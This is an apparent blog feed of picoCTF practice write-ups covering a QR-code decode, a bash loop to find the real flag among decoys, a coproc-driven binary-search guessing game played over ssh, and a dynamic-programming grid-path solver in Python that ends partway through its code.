CTF writeupshttps://moormaster.codeberg.page/CtfWriteups/2024-12-07T00:00:00+01:00Forensics / Scan Surprise2024-12-07T00:00:00+01:002024-12-07T00:00:00+01:00moormastertag:moormaster.codeberg.page,2024-12-07:/CtfWriteups/forensics-scan-surprise.html<p>We are presented a <code>challenge.zip</code> containing</p>
<div class="highlight"><pre><span></span><code>home/
ctf-player/
drop-in/
flag.png
</code></pre></div>
<p>as well as a remote shell printing a qr code. The same QR code is also found in the <code>flag.png</code> inside of the <code>challenge.zip</code> and on the remote shell</p>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>ls
flag.png
</code></pre></div>
<p>To decode QR codes …</p><p>We are presented a <code>challenge.zip</code> containing</p>
<div class="highlight"><pre><span></span><code>home/
ctf-player/
drop-in/
flag.png
</code></pre></div>
<p>as well as a remote shell printing a qr code. The same QR code is also found in the <code>flag.png</code> inside of the <code>challenge.zip</code> and on the remote shell</p>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>ls
flag.png
</code></pre></div>
<p>To decode QR codes from an image we can use a command line tool like the <a href="https://zbar.sourceforge.net/">zbar bar code reader</a>. Fortunately this tool is already installed on the remote shell so we simply call it and get our flag</p>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>zbarimg<span class="w"> </span>flag.png
QR-Code:picoCTF<span class="o">{</span>...<span class="o">}</span>
</code></pre></div>Forensics / Verify2024-12-07T00:00:00+01:002024-12-07T00:00:00+01:00moormastertag:moormaster.codeberg.page,2024-12-07:/CtfWriteups/forensics-verify.html<p>After logging in to a remote shell we find a folder <code>files/</code> containing flags and fake flags and a script <code>./decrypt.sh</code> as well to check and decrypt those files.</p>
<p>If we run the script on one of those files we get an output telling us whether that file contains …</p><p>After logging in to a remote shell we find a folder <code>files/</code> containing flags and fake flags and a script <code>./decrypt.sh</code> as well to check and decrypt those files.</p>
<p>If we run the script on one of those files we get an output telling us whether that file contains a <code>fake flag</code> or not:</p>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>./decrypt.sh<span class="w"> </span>files/0SgkM1fC<span class="w"> </span>
bad<span class="w"> </span>magic<span class="w"> </span>number
Error:<span class="w"> </span>Failed<span class="w"> </span>to<span class="w"> </span>decrypt<span class="w"> </span><span class="s1">'files/0SgkM1fC'</span>.<span class="w"> </span>This<span class="w"> </span>flag<span class="w"> </span>is<span class="w"> </span>fake!<span class="w"> </span>Keep<span class="w"> </span>looking!
</code></pre></div>
<p>Now all we need to do is do some bash magic to run that script <a href="https://www.man7.org/linux/man-pages/man1/bash.1.html#SHELL_GRAMMAR">for every</a> single file in the <code>files/</code> directory.</p>
<p>Typing a loop into the bash checks to call <code>./decrypt.sh</code> on each file will give us a longer output containing the flag somewhere in between:</p>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span><span class="k">for</span><span class="w"> </span>f<span class="w"> </span><span class="k">in</span><span class="w"> </span>files/*<span class="p">;</span><span class="w"> </span><span class="k">do</span><span class="w"> </span>./decrypt.sh<span class="w"> </span><span class="s2">"</span><span class="nv">$f</span><span class="s2">"</span><span class="p">;</span><span class="w"> </span><span class="k">done</span>
bad<span class="w"> </span>magic<span class="w"> </span>number
Error:<span class="w"> </span>Failed<span class="w"> </span>to<span class="w"> </span>decrypt<span class="w"> </span><span class="s1">'files/0SgkM1fC'</span>.<span class="w"> </span>This<span class="w"> </span>flag<span class="w"> </span>is<span class="w"> </span>fake!<span class="w"> </span>Keep<span class="w"> </span>looking!
bad<span class="w"> </span>magic<span class="w"> </span>number
Error:<span class="w"> </span>Failed<span class="w"> </span>to<span class="w"> </span>decrypt<span class="w"> </span><span class="s1">'files/0aer7B0J'</span>.<span class="w"> </span>This<span class="w"> </span>flag<span class="w"> </span>is<span class="w"> </span>fake!<span class="w"> </span>Keep<span class="w"> </span>looking!
...
</code></pre></div>
<p>To strip off all those outputs for the fake flag we use <a href="https://man7.org/linux/man-pages/man1/grep.1.html">grep --invert-match</a> or its shorthand version <code>grep -v</code> to filter out all lines containing <code>flag is fake</code></p>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span><span class="k">for</span><span class="w"> </span>f<span class="w"> </span><span class="k">in</span><span class="w"> </span>files/*<span class="p">;</span><span class="w"> </span><span class="k">do</span><span class="w"> </span>./decrypt.sh<span class="w"> </span><span class="s2">"</span><span class="nv">$f</span><span class="s2">"</span><span class="p">;</span><span class="w"> </span><span class="k">done</span><span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>-v<span class="w"> </span><span class="s1">'flag is fake'</span>
bad<span class="w"> </span>magic<span class="w"> </span>number
bad<span class="w"> </span>magic<span class="w"> </span>number
...
</code></pre></div>
<p>We still get <code>bad magic number</code> outputs written to stderr which we can get rid of by <a href="https://www.man7.org/linux/man-pages/man1/bash.1.html#REDIRECTION">redirecting</a> stderr to <code>/dev/null</code></p>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span><span class="k">for</span><span class="w"> </span>f<span class="w"> </span><span class="k">in</span><span class="w"> </span>files/*<span class="p">;</span><span class="w"> </span><span class="k">do</span><span class="w"> </span>./decrypt.sh<span class="w"> </span><span class="s2">"</span><span class="nv">$f</span><span class="s2">"</span><span class="p">;</span><span class="w"> </span><span class="k">done</span><span class="w"> </span><span class="m">2</span>><span class="w"> </span>/dev/null<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>-v<span class="w"> </span><span class="s1">'flag is fake'</span>
picoCTF<span class="o">{</span>...<span class="o">}</span>
</code></pre></div>General Skills / Binary Search2024-12-07T00:00:00+01:002024-12-07T00:00:00+01:00moormastertag:moormaster.codeberg.page,2024-12-07:/CtfWriteups/general-skills-binary-search.html<p>We are provided a game script that automatically gets executed when connecting to the remote shell:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/bash</span>
<span class="c1"># Generate a random number between 1 and 1000</span>
<span class="nv">target</span><span class="o">=</span><span class="k">$((</span><span class="w"> </span><span class="o">(</span><span class="nv">RANDOM</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="m">1000</span><span class="o">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="m">1</span><span class="w"> </span><span class="k">))</span>
<span class="nb">echo</span><span class="w"> </span><span class="s2">"Welcome to the Binary Search Game!"</span>
<span class="nb">echo</span><span class="w"> </span><span class="s2">"I'm thinking of a number between 1 and 1000."</span>
<span class="c1"># Trap …</span></code></pre></div><p>We are provided a game script that automatically gets executed when connecting to the remote shell:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/bash</span>
<span class="c1"># Generate a random number between 1 and 1000</span>
<span class="nv">target</span><span class="o">=</span><span class="k">$((</span><span class="w"> </span><span class="o">(</span><span class="nv">RANDOM</span><span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="m">1000</span><span class="o">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="m">1</span><span class="w"> </span><span class="k">))</span>
<span class="nb">echo</span><span class="w"> </span><span class="s2">"Welcome to the Binary Search Game!"</span>
<span class="nb">echo</span><span class="w"> </span><span class="s2">"I'm thinking of a number between 1 and 1000."</span>
<span class="c1"># Trap signals to prevent exiting</span>
<span class="nb">trap</span><span class="w"> </span><span class="s1">'echo "Exiting is not allowed."'</span><span class="w"> </span>INT
<span class="nb">trap</span><span class="w"> </span><span class="s1">''</span><span class="w"> </span>SIGQUIT
<span class="nb">trap</span><span class="w"> </span><span class="s1">''</span><span class="w"> </span>SIGTSTP
<span class="c1"># Limit the player to 10 guesses</span>
<span class="nv">MAX_GUESSES</span><span class="o">=</span><span class="m">10</span>
<span class="nv">guess_count</span><span class="o">=</span><span class="m">0</span>
<span class="k">while</span><span class="w"> </span><span class="o">((</span><span class="w"> </span>guess_count<span class="w"> </span><<span class="w"> </span>MAX_GUESSES<span class="w"> </span><span class="o">))</span><span class="p">;</span><span class="w"> </span><span class="k">do</span>
<span class="w"> </span><span class="nb">read</span><span class="w"> </span>-p<span class="w"> </span><span class="s2">"Enter your guess: "</span><span class="w"> </span>guess
<span class="w"> </span><span class="k">if</span><span class="w"> </span>!<span class="w"> </span><span class="o">[[</span><span class="w"> </span><span class="s2">"</span><span class="nv">$guess</span><span class="s2">"</span><span class="w"> </span><span class="o">=</span>~<span class="w"> </span>^<span class="o">[</span><span class="m">0</span>-9<span class="o">]</span>+$<span class="w"> </span><span class="o">]]</span><span class="p">;</span><span class="w"> </span><span class="k">then</span>
<span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"Please enter a valid number."</span>
<span class="w"> </span><span class="k">continue</span>
<span class="w"> </span><span class="k">fi</span>
<span class="w"> </span><span class="o">((</span><span class="w"> </span>guess_count++<span class="w"> </span><span class="o">))</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="o">((</span><span class="w"> </span>guess<span class="w"> </span><<span class="w"> </span>target<span class="w"> </span><span class="o">))</span><span class="p">;</span><span class="w"> </span><span class="k">then</span>
<span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"Higher! Try again."</span>
<span class="w"> </span><span class="k">elif</span><span class="w"> </span><span class="o">((</span><span class="w"> </span>guess<span class="w"> </span>><span class="w"> </span>target<span class="w"> </span><span class="o">))</span><span class="p">;</span><span class="w"> </span><span class="k">then</span>
<span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"Lower! Try again."</span>
<span class="w"> </span><span class="k">else</span>
<span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"Congratulations! You guessed the correct number: </span><span class="nv">$target</span><span class="s2">"</span>
<span class="w"> </span><span class="c1"># Retrieve the flag from the metadata file</span>
<span class="w"> </span><span class="nv">flag</span><span class="o">=</span><span class="k">$(</span>cat<span class="w"> </span>/challenge/metadata.json<span class="w"> </span><span class="p">|</span><span class="w"> </span>jq<span class="w"> </span>-r<span class="w"> </span><span class="s1">'.flag'</span><span class="k">)</span>
<span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"Here's your flag: </span><span class="nv">$flag</span><span class="s2">"</span>
<span class="w"> </span><span class="nb">exit</span><span class="w"> </span><span class="m">0</span><span class="w"> </span><span class="c1"># Exit with success code</span>
<span class="w"> </span><span class="k">fi</span>
<span class="k">done</span>
<span class="c1"># Player has exceeded maximum guesses</span>
<span class="nb">echo</span><span class="w"> </span><span class="s2">"Sorry, you've exceeded the maximum number of guesses."</span>
<span class="nb">exit</span><span class="w"> </span><span class="m">1</span><span class="w"> </span><span class="c1"># Exit with error code to close the connection</span>
</code></pre></div>
<p>The task is to implement a script that reads the output of the shell and implements binary search to find the correct answer.</p>
<p>To connect stdin & stdout of a script with stdout & stdin of another command (i.e. a remote shell) one can use <a href="https://www.gnu.org/software/bash/manual/html_node/Coprocesses.html">coproc</a></p>
<div class="highlight"><pre><span></span><code>coproc<span class="w"> </span>A<span class="w"> </span><span class="o">{</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"hello from proc A"</span><span class="p">;</span><span class="w"> </span><span class="nb">read</span><span class="w"> </span>a<span class="p">;</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"proc A received: </span><span class="nv">$a</span><span class="s2">"</span><span class="w"> </span>><span class="p">&</span><span class="m">2</span><span class="p">;</span><span class="w"> </span><span class="o">}</span>
<span class="o">{</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"hello from proc B"</span><span class="p">;</span><span class="w"> </span><span class="nb">read</span><span class="w"> </span>a<span class="p">;</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"proc B received: </span><span class="nv">$a</span><span class="s2">"</span><span class="w"> </span>><span class="p">&</span><span class="m">2</span><span class="p">;</span><span class="w"> </span><span class="o">}</span><span class="w"> </span><<span class="p">&</span><span class="si">${</span><span class="nv">A</span><span class="p">[0]</span><span class="si">}</span><span class="w"> </span>><span class="p">&</span><span class="si">${</span><span class="nv">A</span><span class="p">[1]</span><span class="si">}</span>
</code></pre></div>
<p>output:</p>
<div class="highlight"><pre><span></span><code><span class="k">proc</span><span class="w"> </span><span class="nv">B</span><span class="w"> </span><span class="nv">received</span><span class="p">:</span><span class="w"> </span><span class="nv">hello</span><span class="w"> </span><span class="nv">from</span><span class="w"> </span><span class="nv">proc</span><span class="w"> </span><span class="nv">A</span>
<span class="k">proc</span><span class="w"> </span><span class="nv">A</span><span class="w"> </span><span class="nv">received</span><span class="p">:</span><span class="w"> </span><span class="nv">hello</span><span class="w"> </span><span class="nv">from</span><span class="w"> </span><span class="nv">proc</span><span class="w"> </span><span class="nv">B</span>
</code></pre></div>
<p>so we first build ourselves a helper script to connect stdin/stdout of two commands using <code>coproc</code>.</p>
<p>coproc-connect.sh</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/bin/bash</span>
<span class="k">if</span><span class="w"> </span><span class="o">[</span><span class="w"> </span><span class="nv">$#</span><span class="w"> </span>-ge<span class="w"> </span><span class="m">2</span><span class="w"> </span><span class="o">]</span>
<span class="k">then</span>
<span class="w"> </span><span class="nv">script</span><span class="o">=</span><span class="s2">"</span><span class="nv">$1</span><span class="s2">"</span>
<span class="w"> </span><span class="nb">shift</span>
<span class="w"> </span>coproc<span class="w"> </span>A<span class="w"> </span><span class="o">{</span><span class="w"> </span><span class="s2">"</span><span class="nv">$@</span><span class="s2">"</span><span class="p">;</span><span class="w"> </span><span class="o">}</span>
<span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"Giving 5s time to enter ssh password.."</span>
<span class="w"> </span>sleep<span class="w"> </span><span class="m">5</span>
<span class="w"> </span><span class="s2">"</span><span class="nv">$script</span><span class="s2">"</span><span class="w"> </span><<span class="p">&</span><span class="si">${</span><span class="nv">A</span><span class="p">[0]</span><span class="si">}</span><span class="w"> </span>><span class="p">&</span><span class="si">${</span><span class="nv">A</span><span class="p">[1]</span><span class="si">}</span>
<span class="k">else</span>
<span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"Usage: </span><span class="nv">$0</span><span class="s2"> <script1> <command>"</span>
<span class="k">fi</span>
</code></pre></div>
<p>Now we can use that helper script for both</p>
<ul>
<li>testing a local binary-search implementation against the local <code>guessing-game.sh</code></li>
<li>running a local binary-search implementation against the remote shell</li>
</ul>
<p>What we are still missing is the binary-search implementation, so lets create one.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/bin/bash</span>
<span class="nv">upper_bound</span><span class="o">=</span><span class="m">1000</span>
<span class="nv">lower_bound</span><span class="o">=</span><span class="m">1</span>
<span class="nv">candidate</span><span class="o">=</span><span class="m">500</span>
<span class="c1"># receive and echo welcome messages from game</span>
<span class="nb">read</span><span class="w"> </span>welcome_message<span class="p">;</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"<- </span><span class="nv">$welcome_message</span><span class="s2">"</span><span class="w"> </span>><span class="p">&</span><span class="m">2</span>
<span class="nb">read</span><span class="w"> </span>welcome_message<span class="p">;</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"<- </span><span class="nv">$welcome_message</span><span class="s2">"</span><span class="w"> </span>><span class="p">&</span><span class="m">2</span>
<span class="k">while</span><span class="w"> </span><span class="nb">true</span>
<span class="k">do</span>
<span class="w"> </span><span class="c1"># send and echo (next) answer</span>
<span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"</span><span class="si">${</span><span class="nv">candidate</span><span class="si">}</span><span class="s2">"</span><span class="p">;</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"-> </span><span class="si">${</span><span class="nv">candidate</span><span class="si">}</span><span class="s2">"</span><span class="w"> </span>><span class="p">&</span><span class="m">2</span>
<span class="w"> </span><span class="c1"># receive and echo response</span>
<span class="w"> </span><span class="nb">read</span><span class="w"> </span>response<span class="p">;</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"<- </span><span class="nv">$response</span><span class="s2">"</span><span class="w"> </span>><span class="p">&</span><span class="m">2</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"</span><span class="nv">$response</span><span class="s2">"</span><span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>-q<span class="w"> </span><span class="s2">"Higher"</span>
<span class="w"> </span><span class="k">then</span>
<span class="w"> </span><span class="nv">lower_bound</span><span class="o">=</span><span class="si">${</span><span class="nv">candidate</span><span class="si">}</span>
<span class="w"> </span><span class="k">elif</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"</span><span class="nv">$response</span><span class="s2">"</span><span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>-q<span class="w"> </span><span class="s2">"Lower"</span>
<span class="w"> </span><span class="k">then</span>
<span class="w"> </span><span class="nv">upper_bound</span><span class="o">=</span><span class="si">${</span><span class="nv">candidate</span><span class="si">}</span>
<span class="w"> </span><span class="k">else</span>
<span class="w"> </span><span class="k">break</span>
<span class="w"> </span><span class="k">fi</span>
<span class="w"> </span><span class="c1"># calculate next candidate answer in the middle between lower and upper bounds</span>
<span class="w"> </span><span class="nv">candidate</span><span class="o">=</span><span class="k">$((</span><span class="w"> </span><span class="si">${</span><span class="nv">lower_bound</span><span class="si">}</span><span class="o">+(</span><span class="si">${</span><span class="nv">upper_bound</span><span class="si">}</span><span class="o">-</span><span class="si">${</span><span class="nv">lower_bound</span><span class="si">}</span><span class="o">)/</span><span class="m">2</span><span class="w"> </span><span class="k">))</span>
<span class="k">done</span>
<span class="c1"># receive and echo flag</span>
<span class="nb">read</span><span class="w"> </span>flag<span class="p">;</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="s2">"</span><span class="nv">$flag</span><span class="s2">"</span><span class="w"> </span>><span class="p">&</span><span class="m">2</span>
</code></pre></div>
<p>A small test against the local <code>./guessing_game.sh</code> proves that the solution works</p>
<div class="highlight"><pre><span></span><code>$ ./coproc-connect.sh ./solution.sh home/ctf-player/drop-in/guessing_game.sh
Giving 5s time to enter ssh password..
<- Welcome to the Binary Search Game!
<- I'm thinking of a number between 1 and 1000.
-> 500
<- Lower! Try again.
-> 250
<- Higher! Try again.
-> 375
<- Higher! Try again.
-> 437
<- Lower! Try again.
-> 406
<- Congratulations! You guessed the correct number: 406
home/ctf-player/drop-in/guessing_game.sh: Zeile 37: jq: Kommando nicht gefunden.
cat: /challenge/metadata.json: Datei oder Verzeichnis nicht gefunden
406
</code></pre></div>
<p>Running it against the remote shell will replace the error message with the flag of the challenge:</p>
<div class="highlight"><pre><span></span><code>$ ./coproc-connect.sh ./solution.sh ssh -p 60545 ctf-player@atlas.picoctf.net
Giving 5s time to enter ssh password..
Pseudo-terminal will not be allocated because stdin is not a terminal.
ctf-player@atlas.picoctf.net's password:
<- Welcome to the Binary Search Game!
<- I'm thinking of a number between 1 and 1000.
-> 500
<- Lower! Try again.
-> 250
<- Lower! Try again.
-> 125
<- Lower! Try again.
-> 63
<- Higher! Try again.
-> 94
<- Higher! Try again.
-> 109
<- Congratulations! You guessed the correct number: 109
Here's your flag: picoCTF{...}
</code></pre></div>picoCTF practice2024-12-07T00:00:00+01:002024-12-07T00:00:00+01:00moormastertag:moormaster.codeberg.page,2024-12-07:/CtfWriteups/picoctf-practice.html<p>URL: <a href="https://play.picoctf.org/practice">picoCTF</a></p>
<p>Writeups can be found at <a href="https://moormaster.codeberg.page/CtfWriteups/category/picoctf-practice.html">picoCTF practice</a></p>BackFromBrazil2024-08-04T00:00:00+02:002024-08-04T00:00:00+02:00moormastertag:moormaster.codeberg.page,2024-08-04:/CtfWriteups/backfrombrazil.html<p>Given 10 different squares made up of 1000x1000 random numbers you need to input the optimal path from the upper left to the lower right corner consisting only of steps d - down or r - right. The sum of all the visited numbers must be maximal.</p>
<p>An approach using <a href="https://en.wikipedia.org/wiki/Dynamic_programming">dynamic programming …</a></p><p>Given 10 different squares made up of 1000x1000 random numbers you need to input the optimal path from the upper left to the lower right corner consisting only of steps d - down or r - right. The sum of all the visited numbers must be maximal.</p>
<p>An approach using <a href="https://en.wikipedia.org/wiki/Dynamic_programming">dynamic programming</a> can be used to find the optimal path through the square.</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span><span class="w"> </span><span class="nn">sys</span>
<span class="n">MAX_RUNS</span> <span class="o">=</span> <span class="mi">10</span>
<span class="n">DIMENSION</span> <span class="o">=</span> <span class="mi">1000</span>
<span class="c1"># make recursion depth large enough so that width and length of the eggs-square fits in</span>
<span class="n">sys</span><span class="o">.</span><span class="n">setrecursionlimit</span><span class="p">(</span><span class="mi">2</span><span class="o">*</span><span class="n">DIMENSION</span> <span class="o">+</span> <span class="n">sys</span><span class="o">.</span><span class="n">getrecursionlimit</span><span class="p">())</span>
<span class="k">def</span><span class="w"> </span><span class="nf">find_max_path</span><span class="p">(</span><span class="n">eggs</span><span class="p">,</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">,</span> <span class="n">cached_result</span> <span class="o">=</span> <span class="kc">None</span><span class="p">):</span>
<span class="k">if</span> <span class="n">cached_result</span> <span class="ow">is</span> <span class="kc">None</span><span class="p">:</span>
<span class="n">cached_result</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">()</span>
<span class="k">if</span> <span class="p">(</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">)</span> <span class="ow">in</span> <span class="n">cached_result</span><span class="p">:</span>
<span class="k">return</span> <span class="n">cached_result</span><span class="p">[(</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">)]</span>
<span class="n">right_result</span> <span class="o">=</span> <span class="kc">None</span>
<span class="k">if</span> <span class="n">x</span><span class="o">+</span><span class="mi">1</span> <span class="o"><</span> <span class="n">DIMENSION</span><span class="p">:</span>
<span class="n">right_result</span> <span class="o">=</span> <span class="n">find_max_path</span><span class="p">(</span><span class="n">eggs</span><span class="p">,</span> <span class="n">x</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span> <span class="n">y</span><span class="p">,</span> <span class="n">cached_result</span><span class="p">)</span>
<span class="n">down_result</span> <span class="o">=</span> <span class="kc">None</span>
<span class="k">if</span> <span class="n">y</span><span class="o">+</span><span class="mi">1</span> <span class="o"><</span> <span class="n">DIMENSION</span><span class="p">:</span>
<span class="n">down_result</span> <span class="o">=</span> <span class="n">find_max_path</span><span class="p">(</span><span class="n">eggs</span><span class="p">,</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span> <span class="n">cached_result</span><span class="p">)</span>
<span class="k">if</span> <span class="n">right_result</span> <span class="ow">is</span> <span class="kc">None</span> <span class="ow">and</span> <span class="n">down_result</span> <span class="ow">is</span> <span class="kc">None</span><span class="p">:</span>
<span class="n">cached_result</span><span class="p">[(</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">)]</span> <span class="o">=</span> <span class="p">(</span><span class="s1">''</span><span class="p">,</span> <span class="n">eggs</span><span class="p">[</span><span class="n">y</span><span class="p">][</span><span class="n">x</span><span class="p">])</span>
<span class="k">return</span> <span class="p">(</span><span class="s1">''</span><span class="p">,</span> <span class="n">eggs</span><span class="p">[</span><span class="n">y</span><span class="p">][</span><span class="n">x</span><span class="p">])</span>
<span class="k">if</span> <span class="n">down_result</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span> <span class="ow">and</span> <span class="p">(</span><span class="n">right_result</span> <span class="ow">is</span> <span class="kc">None</span> <span class="ow">or</span> <span class="n">down_result</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">></span> <span class="n">right_result</span><span class="p">[</span><span class="mi">1</span><span class="p">]):</span>
<span class="n">result</span> <span class="o">=</span> <span class="p">(</span><span class="s1">'d'</span> <span class="o">+</span> <span class="n">down_result</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">eggs</span><span class="p">[</span><span class="n">y</span><span class="p">][</span><span class="n">x</span><span class="p">]</span> <span class="o">+</span> <span class="n">down_result</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">cached_result</span><span class="p">[(</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">)]</span> <span class="o">=</span> <span class="n">result</span>
<span class="k">return</span> <span class="n">result</span>
<span class="k">if</span> <span class="n">right_result</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span> <span class="ow">and</span> <span class="p">(</span><span class="n">down_result</span> <span class="ow">is</span> <span class="kc">None</span> <span class="ow">or</span> <span class="n">right_result</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">></span> <span class="n">down_result</span><span class="p">[</span><span class="mi">1</span><span class="p">]):</span>
<span class="n">result</span> <span class="o">=</span> <span class="p">(</span><span class="s1">'r'</span> <span class="o">+</span> <span class="n">right_result</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">eggs</span><span class="p">[</span><span class="n">y</span><span class="p">][</span><span class="n">x</span><span class="p">]</span> <span class="o">+</span> <span class="n">right_result</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">cached_result</span><span class="p">[(</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">)]</span> <span class="o">=</span> <span class="n">result</span>
<span class="k">return</span> <span class="n">result</span>
<span class="n">f</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"backfrombrazil.log"</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">)</span>
<span class="n">success</span> <span class="o">=</span> <span class="kc">True</span>
<span class="c1"># read first input for run</span>
<span class="n">received_reply</span> <span class="o">=</span> <span class="nb">input</span><span class="p">()</span>
<span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s2">"< "</span> <span class="o">+</span> <span class="n">received_reply</span> <span class="o">+</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">)</span>
<span class="k">for</span> <span class="n">run</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">MAX_RUNS</span><span class="p">):</span>
<span class="n">received_rows</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">DIMENSION</span><span class="p">):</span>
<span class="n">received_rows</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">received_reply</span><span class="p">)</span>
<span class="n">received_reply</span> <span class="o">=</span> <span class="nb">input</span><span class="p">()</span>
<span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s2">"< "</span> <span class="o">+</span> <span class="n">received_reply</span> <span class="o">+</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">)</span>
<span class="n">eggs</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">received_row</span> <span class="ow">in</span> <span class="n">received_rows</span><span class="p">:</span>
<span class="n">row</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="nb">map</span><span class="p">(</span>
<span class="k">lambda</span> <span class="n">s</span><span class="p">:</span> <span class="nb">int</span><span class="p">(</span><span class="n">s</span><span class="p">),</span>
<span class="n">received_row</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s2">" "</span><span class="p">)[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="p">))</span>
<span class="n">eggs</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">row</span><span class="p">)</span>
<span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">sum_value</span><span class="p">)</span> <span class="o">=</span> <span class="n">find_max_path</span><span class="p">(</span><span class="n">eggs</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">path</span><span class="p">)</span>
<span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s2">"> "</span> <span class="o">+</span> <span class="n">path</span> <span class="o">+</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">)</span>
<span class="k">if</span> <span class="s2">"still in brazil"</span> <span class="ow">in</span> <span class="n">received_reply</span> <span class="ow">or</span> <span class="s2">"didn't find"</span> <span class="ow">in</span> <span class="n">received_reply</span> <span class="ow">or</span> <span class="s2">"out of time"</span> <span class="ow">in</span> <span class="n">received_reply</span><span class="p">:</span>
<span class="n">success</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">break</span>
<span class="c1"># read first input for next run</span>
<span class="n">received_reply</span> <span class="o">=</span> <span class="nb">input</span><span class="p">()</span>
<span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s2">"< "</span> <span class="o">+</span> <span class="n">received_reply</span> <span class="o">+</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">)</span>
<span class="k">if</span> <span class="n">success</span><span class="p">:</span>
<span class="n">received_reply</span> <span class="o">=</span> <span class="nb">input</span><span class="p">()</span>
<span class="nb">print</span><span class="p">(</span><span class="n">received_reply</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
<span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s2">"< "</span> <span class="o">+</span> <span class="n">received_reply</span> <span class="o">+</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">)</span>
<span class="n">received_reply</span> <span class="o">=</span> <span class="nb">input</span><span class="p">()</span>
